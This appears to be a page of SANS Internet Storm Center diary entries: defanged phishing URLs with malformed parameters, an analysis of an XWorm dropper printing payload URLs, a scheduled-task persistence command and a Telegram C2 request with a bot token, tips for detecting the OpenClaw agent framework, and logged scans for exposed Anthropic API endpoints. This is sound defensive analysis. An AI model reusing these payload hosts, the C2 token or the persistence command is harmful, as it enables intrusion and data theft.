Broken Phishing URLs
For a few days, many phishing emails that landed into my mailbox contain strange URLs. They are classic emails asking you to open a document, verify your pending emails, …
But the format of the URLs is broken! In a URL, parameters are extra pieces of information added after a question mark (?) to tell a website more details about a request; they are written as name=value pairs (for example “email=user@domain”), and multiple parameters are separated by an ampersand (&).
Here are some examples of detected URLs:
hxxps://cooha0720[.]7407cyan[.]workers[.]dev/?dC=handlers@isc[.]sans[.]edu&*(Df hxxps://calcec7[.]61minimal[.]workers[.]dev/?wia=handlers@isc[.]sans[.]edu&*(chgd hxxps://couraol-02717[.]netlify[.]app/?dP=handlers@isc[.]sans[.]edu&*(TemP hxxps://shiny-lab-a6ef[.]tcvtxt[.]workers.dev/?kpv=handlers@isc[.]sans[.]edu&*(lIi
You can see that the parameters are broken… “&*(Df” is invalid! It’s not an issue for browsers that will just ignore these malformed parameters, so the malicious website will be visited.
I did not see this for a while but it seems that the technique is back on stage. Threat actors implement this to break security controls. Many of them assume a “key=value" format. It may also break regex-based detectionn, URL normalization routines or IOC extraction pipelines…
Of course, we can track such URLs using a regex to extract the last param:
Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key
Malicious Script Delivering More Maliciousness
Today, I received an interesting email with a malicious attachment. When I had a look at the automatic scan results, it seemed to be a malicious script to create a Chrome Injector to steal data. Because InfoStealers are very common these days, it looked “legit” but there was something different. The .bat file looks to be a fork of the one found in many GitHub repositories[1].
When the regular script is completed, it jumps to :EndScript:
goto :EndScript
A call to :show_msgbox was added at the script end:
:EndScript endlocal call :show_msgbox exit /b
Then, the magic begins. A payload is obfuscated with junk characters:
Very common techniques, the string is poluted with junk characters. It’s a chunk of Base64-encode data that is executed through a PowerShell:
It fetches a payload from hxxps://uniworldrivercruises-co[.]uk/optimized_MSI.png. This is a real picture:
But when some “fun” at the end. The next payload is delimited (and extracted) using the tags “BaseStart-” and “-BaseEnd”:
It’s a shell code that is invoked with the following parameters:
'==gN1V3dl5UQy8SZslmZvkGch9SbvNmLulWYyRGblhXaw9yL6MHc0RHa','0','C:\Users\Public\Downloads\','VHkaJZD8Iq','appidtel','1','appidtel','1','hxxp://178[.]16[.]53[.]209/buildingmoney.txt','C:\Users\Public\Downloads\','VHkaJZD8Iq','bat','1','0','4spTcCaYQA','0','','',''
The URL points to another payload. When I tried to decode it (it was Base64 encode and reversed), I could not automatically decode it because there was weird (non hex) characters in the string. Thanks to ChatGPT, I decoded it with the following piece of Python script:
from pathlib import Path
import re
import binascii
input_file = Path("payload.txt")
output_file = Path("payload.bin")
raw = input_file.read_bytes()
ascii_data = raw.decode("ascii", errors="ignore")
# Keep only hex characters!!
clean_hex = re.sub(r"[^0-9a-fA-F]", "", ascii_data)
if len(clean_hex) % 2 != 0:
raise ValueError("Odd-length hex string after cleanup")
clean_hex = clean_hex[::-1]
binary = binascii.unhexlify(clean_hex)
output_file.write_bytes(binary)
print(f"[+] Decoded {len(binary)} bytes to {output_file}")
The decoded payload (SHA256:d99318c9b254b4fa5bf6f1dd15996dd50be0676dd84e822503fd273316eb9ba7) is a .Net program. It implements persistence through a scheduled task:
C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /tn "Chromiumx2" /tr "C:\Users\admin\AppData\Roaming\Chromiumx2.exe
And uses Telegram as C2:
hxxps://api[.]telegram[.]org/bot7409572452:AAGp8Ak5bqZu2IkEdggJaz2mnMYRTkTjv-U/sendMessage?chat_id=6870183115&text=%E2%98%A0%20%5BXWorm%20V7.0%20@XCoderTools%5D%0D%0A%0D%0ANew%20CLient%20:%20%0D%0ACAECEB6F4379122BA468%0D%0A%0D%0AUserName%20:%20admin%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20AMD%20Ryzen%205%203500%206-Core%20Processor%0D%0AGPU%20:%20Microsoft%20Basic%20Display%20Adapter%20%0D%0ARAM%20:%205.99%20GB%0D%0AGroup%20:%20XWorm%20V7.1
It's another piece of XWorm! Interesting way to drop the trojan in another malicious script...
[1] https://github.com/00nx/Chrome-App-Bound-Encryption-Bypass/blob/main/make.bat
Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key
0 Comments
Detecting and Monitoring OpenClaw (clawdbot, moltbot)
Last week, a new AI agent framework was introduced to automate "live". It targets office work in particular, focusing on messaging and interacting with systems. The tool has gone viral not so much because of its features, which are similar to those of other agent frameworks, but because of a stream of security oversights in its design.
If you are looking to detect the use of OpenClaw in your environment, Knostic has created scripts to detect It, and, if you do want to use OpenClaw, to collect telemetry about its use.
openclaw-detect https://github.com/knostic/openclaw-detect
This script searches the system for filenames commonly associated with OpenClaw. For example, the presence of the state directory ~/.openclaw or for a Docker container running openclaw. If you have decent endpoint monitoring, this tool may not be needed, but it can give you some hints on which files to look for.
openclaw-telemetry https://github.com/knostic/openclaw-telemetry
If you do run OpenClaw, openclaw-detect will add additional meaningful logging. The tool captures "every tool call, LLM request, and agent session — with built-in redaction, tamper-proof hash chains, syslog/SIEM forwarding, and rate limiting". It is an OpenClaw plugin and installs like any other OpenClaw plugin
In addition, there are a few additional security tools and tips:
- The OpenClaw documentation now has a dedicated security section: https://docs.openclaw.ai/gateway/security
- OpenClaw's documentation explains how to set up OpenClaw inside a Docker sandbox: https://docs.openclaw.ai/cli/sandbox.
- Do not provide OpenClaw with access to accounts you intend to lose.
- Do not expose OpenClaw to the Internet
- ACIP, the "Advanced Cognitive Inoculation Prompt", has a version for OpenClaw that intends to limit prompt injection. https://github.com/Dicklesworthstone/acip/tree/main/integrations/clawdbot
--
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|
2 Comments
Scanning for exposed Anthropic Models
Yesterday, a single IP address (%%ip:204.76.203.210%%) scanned a number of our sensors for what looks like an anthropic API node. The IP address is known to be a Tor exit node.
The requests are pretty simple:
GET /anthropic/v1/models
Host: 67.171.182.193:8000
X-Api-Key: password
Anthropic-Version: 2023-06-01
It looks like this is scanning for locally hosted Anthropic models, but it is not clear to me if this would be successful. If anyone has any insights, please let me know. The API Key is a commonly used key in documentation, and not a key that anybody would expect to work.
At the same time, we are also seeing a small increase in requests for "/v1/messages". These requests have been more common in the past, but the URL may be associated with Anthropic (it is, however, somewhat generic, and it is likely other APIs use the same endpoint. These requests originate from %%ip:154.83.103.179%%, an IP address with a bit a complex geolocation and routing footprint.
--
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|
1 Comments
1 Comments